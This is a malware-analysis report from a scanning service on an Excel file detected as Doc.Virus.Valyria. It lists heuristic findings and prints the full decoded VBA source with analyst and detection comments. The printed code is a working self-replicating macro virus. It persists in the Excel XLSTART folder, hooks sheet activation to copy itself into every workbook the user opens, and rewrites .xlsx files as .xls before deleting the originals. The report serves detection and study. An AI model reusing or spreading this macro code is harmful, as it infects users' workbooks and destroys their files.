MALICIOUS
216
Risk Score
Heuristics 7
-
ClamAV: Doc.Virus.Valyria-10004393-0 — severity: critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Virus.Valyria-10004393-0
-
VBA macros detected — severity: medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — severity: high — OLE_VBA_CREATEOBJ: CreateObject call. Note that the matched line sits inside the JbxInit helper, which appears to be sandbox instrumentation (it writes an API trace to Z:\syscalls\*.vba.csv and all its names carry the Jbx prefix) rather than logic of the original sample. Matched line in script:
Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True) -
VBA copies the workbook into the Excel XLSTART startup folder — severity: high — OLE_VBA_XLSTART_PERSISTENCE: The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour. Matched line in script:
If ThisWorkbook.Path <> Application.StartupPath Then -
VBA infects other workbooks via an OnSheetActivate copy hook — severity: high — OLE_VBA_WORKBOOK_INFECTION_SPREADER: The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens. The matched line below only clears any previous handler; the hook itself is installed two lines later in Auto_Open by `Application.OnSheetActivate = "mypersonnel.xls!allocated"`. Matched line in script:
Application.OnSheetActivate = "" -
Auto_Open macro — severity: low — OLE_VBA_AUTO: Auto_Open macro. Matched line in script:
Sub Auto_Open() -
Auto_Close macro — severity: low — OLE_VBA_AUTOCLOSE: Auto_Close macro. Matched line in script:
Sub Auto_Close()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4309 bytes |
| SHA-256: 31b941d8124fa42ca6c0ccbb0575ad2454a8d3a87a05060703b72f802b8ba6a4 | | | |
Preview script — first 1,000 lines of the extracted script:
Attribute VB_Name = "Kangatang"
' Module header as exported by olevba. The module name "Kangatang" is the same
' string Auto_Open/allocated use as the sheet name copied between workbooks, so
' this code presumably lives in that worksheet's module - confirm against the
' OLE stream names.
' --- sandbox instrumentation state (Jbx* prefix): trace sink plus the MSXML
' objects used to base64-encode logged parameters; not part of the sample's
' own logic ---
Dim jbxXmlOb As Object
Dim jbxXmlNodeOb As Object
Dim jbxB64Array() As Byte
' one-shot "function:<name>" trace flags, one per instrumented procedure
Private jbxstatic_Auto_Open_9306 As Boolean
Private jbxstatic_Auto_Close_6 As Boolean
Private jbxstatic_allocated_9555 As Boolean
' the CSV text stream opened lazily by JbxInit
Dim jbxinstr As Object
' Lazily open the sandbox trace sink (a randomly named CSV under Z:\syscalls\)
' and create the MSXML objects used for base64 encoding. Safe to call repeatedly:
' once jbxinstr is set the routine returns immediately.
Private Sub JbxInit()
If Not (jbxinstr Is Nothing) Then Exit Sub
Randomize
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Set jbxinstr = fso.CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Set jbxXmlOb = CreateObject("MSXML2.DOMDocument")
Set jbxXmlNodeOb = jbxXmlOb.createElement("b64")
End Sub
' Base64-encode the ANSI bytes of arrData through the MSXML "bin.base64" typed
' node, then strip any line feeds from the result. Writes the module-level
' jbxB64Array buffer as a side effect.
Private Function JbxB64Encode(ByVal arrData As String) As String
jbxB64Array = StrConv(arrData, vbFromUnicode)
With jbxXmlNodeOb
.dataType = "bin.base64"
.nodeTypedValue = jbxB64Array
JbxB64Encode = Replace(.Text, vbLf, "")
End With
End Function
' Close and release the trace sink; a no-op when it was never opened.
Private Sub JbxClose()
If jbxinstr Is Nothing Then Exit Sub
jbxinstr.Close
Set jbxinstr = Nothing
End Sub
' Append one "param:<name>:type:<TypeName>:value:<base64>" record to the trace.
' Err.Number/Description are captured first and restored afterwards so the hook
' does not disturb an error state the sample's own code may be inspecting.
Private Sub JbxLogParam(ByVal paramName As String, ByVal param)
Dim savedErrNum, savedErrDesc
savedErrNum = Err.Number
savedErrDesc = Err.Description
JbxInit
jbxinstr.Write "param:" & paramName & ":type:" & TypeName(param) & ":value:"
On Error Resume Next
Select Case TypeName(param)
Case "String()"
' string arrays are flattened to one space-separated string before encoding
jbxinstr.Write JbxB64Encode(Join(param, " "))
Case Else
jbxinstr.Write JbxB64Encode(param)
End Select
Err.Number = savedErrNum
Err.Description = savedErrDesc
jbxinstr.WriteLine ""
End Sub
' Write one raw line to the trace sink. Always returns True, which the
' instrumented procedures store as their "already logged" flag.
Private Function JbxLog(ByVal str As String) As Boolean
JbxInit
jbxinstr.WriteLine str
JbxLog = True
End Function
' Instrumented stand-in for VBA's Replace(expr, find, replaceWith): logs the call
' site tag (jbxline), the three arguments and the result, and returns exactly what
' Replace returns. Tracing stops after the first 200 invocations in this run.
Private Function JbxHook_Replace_3_(jbxline, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Static callsTraced As Integer
Dim trace As Boolean
trace = (callsTraced < 200)
If trace Then
JbxLog "api:" & jbxline & ":Replace"
JbxLogParam "jbxparam0", jbxparam0
JbxLogParam "jbxparam1", jbxparam1
JbxLogParam "jbxparam2", jbxparam2
End If
JbxHook_Replace_3_ = Replace(jbxparam0, jbxparam1, jbxparam2)
If trace Then
callsTraced = callsTraced + 1
JbxLogParam "jbxreturn", JbxHook_Replace_3_
End If
End Function
' Runs automatically when the workbook is opened. After the sandbox trace marker
' it performs two stages:
'  1. persistence  - a copy is saved into the Excel XLSTART folder
'                    (Application.StartupPath) as mypersonnel.xls;
'  2. replication  - Application.OnSheetActivate is pointed at that copy's
'                    "allocated" procedure, so every later sheet activation in
'                    any workbook runs the infection routine.
' Detection: new *.xls files written under the user's XLSTART path, and
' document code assigning Application.OnSheetActivate, are the observable
' artefacts of this routine.
Sub Auto_Open()
' one-shot trace marker (JbxLog always returns True)
If Not jbxstatic_Auto_Open_9306 Then
jbxstatic_Auto_Open_9306 = JbxLog("function:Auto_Open")
End If
' Ctrl+Break cannot interrupt the macro and Excel's confirmation prompts are suppressed
Application.EnableCancelKey = xlDisabled
Application.DisplayAlerts = False
' every failure from here on is silently ignored
On Error Resume Next
' Stage 1: only when not already running from XLSTART, drop the copy there;
' the window is hidden while the copy is written.
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
' Stage 2: clear any previous handler, then route sheet activations to the
' persisted copy's "allocated" procedure (defined later in this module).
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
JbxClose
End Sub
' Runs when the workbook is closed. If the file currently has an .xlsx name
' (a format that cannot store VBA) and Application.Version is above 11, the
' workbook is re-saved as a legacy .xls (xlExcel8) so the macro survives, and
' the original .xlsx is then deleted. Otherwise nothing beyond the trace marker
' happens.
Sub Auto_Close()
' one-shot trace marker
If Not jbxstatic_Auto_Close_6 Then
jbxstatic_Auto_Close_6 = JbxLog("function:Auto_Close")
End If
On Error Resume Next
Application.DisplayAlerts = False
' Right(Name, 4) is the last four characters, i.e. "xlsx" for a ".xlsx" name.
' The version threshold presumably selects Excel releases that use .xlsx - confirm.
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then
JbxClose
Exit Sub
End If
' JbxHook_Replace_3_ is the sandbox's traced wrapper around Replace (see above);
' the 26/29 first arguments are source-line tags for the trace only.
' Saves "<name>.xls" beside the original, no password, no backup copy.
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & JbxHook_Replace_3_(26, ThisWorkbook.Name, ".xlsx", ".xls"), FileFormat:=xlExcel8, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
' After a successful SaveAs the workbook's Name is presumably the new .xls name,
' so swapping ".xls" back to ".xlsx" yields the original file, which is deleted.
' NOTE(review): if SaveAs failed (errors are suppressed), Name still ends in
' ".xlsx" and this Replace would produce ".xlsxx", so the Kill would miss.
Kill ThisWorkbook.Path & "\" & JbxHook_Replace_3_(29, ThisWorkbook.Name, ".xls", ".xlsx")
JbxClose
End Sub
' Replication handler, reached through Application.OnSheetActivate (set in
' Auto_Open) whenever a sheet is activated in any open workbook. If the active
' workbook's first sheet is not already named "Kangatang", the "Kangatang" sheet
' from this workbook (presumably the sheet hosting this module - see VB_Name
' above) is copied in front of it, and the previously active sheet is
' re-selected so the change is not visible.
' Detection: a sheet named "Kangatang" appearing as Sheets(1) in otherwise
' unrelated workbooks is the infection marker this routine keys on.
' Note: currentsh is never declared (no Option Explicit), so it is an
' implicitly created Variant.
Sub allocated()
' one-shot trace marker
If Not jbxstatic_allocated_9555 Then
jbxstatic_allocated_9555 = JbxLog("function:allocated")
End If
On Error Resume Next
' skip workbooks that already carry the sheet
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Header of the workbook's document module (VB_Base is the Workbook class GUID).
' No procedure code follows it in the extracted preview; the macro logic is all
' in the "Kangatang" module above.